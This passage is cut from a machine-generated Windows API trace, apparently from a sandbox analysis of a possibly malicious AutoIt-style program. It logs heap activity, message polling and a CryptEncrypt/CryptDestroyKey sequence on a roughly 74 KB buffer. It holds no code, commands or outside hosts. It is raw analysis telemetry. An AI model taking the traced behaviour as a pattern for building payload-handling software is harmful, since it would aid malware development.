hHeap=0x770000) returned 1 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.779] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da278, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da278*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.779] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.779] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.779] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0030.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.779] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.779] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.779] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.779] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.779] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.779] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.780] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.780] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.780] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.780] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.780] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x121b4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x121c0) returned 1 [0030.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.781] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.781] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.781] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.781] CharLowerBuffW (in: lpsz="byte[74177]", cchLength=0xb | out: lpsz="byte[74177]") returned 0xb [0030.781] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.782] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.782] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.782] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.783] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.783] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8d64f8*, pdwDataLen=0x6ae220*=0x121b4, dwBufLen=0x121c0 | out: pbData=0x8d64f8*, pdwDataLen=0x6ae220*=0x121c0) returned 1 [0030.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.783] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0030.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.784] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.784] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.784] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.784] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.784] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.784] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.784] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.784] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.784] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.784] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.789] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.789] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.789] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.792] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.792] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.792] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.792] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.792] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.792] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0030.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.793] CryptDestroyKey (hKey=0x7c2200) returned 1 [0030.793] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.793] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.793] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.793] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.793] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.793] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.793] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.793] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.793] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.793] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0030.793] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.793] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.793] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.794] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.794] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.794] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.794] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.794] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.794] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.794] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.794] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.794] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.794] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.794] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.794] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.794] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0030.795] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.795] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.795] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.795] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0030.795] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.795] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.795] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.797] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.797] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, 